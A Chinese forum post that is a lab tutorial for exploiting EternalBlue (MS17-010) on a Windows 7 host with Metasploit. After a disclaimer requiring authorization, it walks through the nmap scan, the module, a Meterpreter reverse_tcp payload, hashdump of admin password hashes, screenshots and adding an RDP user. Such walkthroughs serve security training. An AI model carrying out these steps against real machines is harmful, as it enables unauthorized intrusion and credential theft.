本帖最后由 富贵花开 于 2025-3-7 21:18 编辑
免责说明:
1. 目的
本免责声明旨在明确渗透测试的范围、责任及限制,确保测试在法律和合同框架内进行。
2. 授权
渗透测试必须在客户明确授权后进行,未经许可的测试将被视为非法行为。
3. 范围
测试仅限于客户指定的系统和网络,不得超出授权范围。
实验环境: 攻击机:kali 192.168.10.196 靶机:win7 192.168.10.202
永恒之蓝ms17_010 利用的是 win7的 445端口 咱们这次主要是利用445端口来获取目标主机的meterpreter权限以及cmd权限 1.检测靶机445端口是否开启 nmap -sS 192.168.10.202
2.使用命令:msfconsole打开MSF命令台,出现msf6 > 的命令行即为成功
使用命令:search 17-010搜索,选择下面这个攻击模块 使用use 3 看靶机是否存在 永恒之蓝ms17_010 漏洞 配置Rhosts 地址为靶机地址 然后开始run 看是否存在漏洞
发现存在漏洞 用 use 0 进行攻击 配置 靶机 和 攻击机 的地址
配置线程 set payload windows/x64/meterpreter/reverse_tcp
然后开始进行攻击:run
出现以下字样即为攻击成功 输入ipconfig 看看是不是win7的地址
然后拿到shell
然后根据Windows的命令 添加用户 然后加入权限 直接3389 就登录了 这里我就不演示了。
我们来查看下win7管理员的账号密码 输入 hashdump
获取屏幕screenshare
|